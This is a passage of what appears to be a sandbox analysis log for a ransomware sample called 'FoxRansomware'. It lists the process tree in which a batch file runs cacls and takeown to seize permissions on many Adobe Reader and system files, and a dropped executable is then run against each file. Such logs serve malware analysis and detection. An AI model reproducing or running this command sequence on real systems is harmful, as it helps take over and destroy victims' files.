C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:3260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:3840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:3352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:2636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:2456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:3132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:3036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:2172
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:2252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:2920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:2664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can03.ths" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can03.ths" -nobanner4⤵PID:2184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:3888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:2708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:2340
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:2524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:3620
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:2736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:3044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:3576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:2212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:3540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:2828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
PID:3796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:2788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵
- Modifies file permissions
PID:3748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:2484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:2360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
PID:4080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:3500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:3516
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:3688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:2724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:3100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:1116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:3156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
PID:2696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:3420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:3224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:1616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:3864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:3368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt04.hsp" -nobanner3⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "brt04.hsp" -nobanner4⤵PID:3432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:2544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:3288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "engphon.env" -nobanner3⤵PID:3476
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "engphon.env" -nobanner4⤵PID:3568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:3128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:3252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:3652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:3248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:1276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:3392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:3560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:3268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:2460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:2516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:2628
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:2844
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "superbar.png" -nobanner3⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "superbar.png" -nobanner4⤵PID:2108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:2560
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:3428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:3208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:2160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "pmd.cer" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "pmd.cer" -nobanner4⤵PID:3376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:2684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:3724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:3524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:2552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:3912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "pdf.gif" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "pdf.gif" -nobanner4⤵PID:3384
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:3948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:3876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "server_issue.gif" -nobanner3⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "server_issue.gif" -nobanner4⤵PID:3328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:3016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:3996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:1532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:1712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:2904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:3272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:2088
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:2456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:2740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:2132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "zx______.pfm" -nobanner3⤵PID:540
-
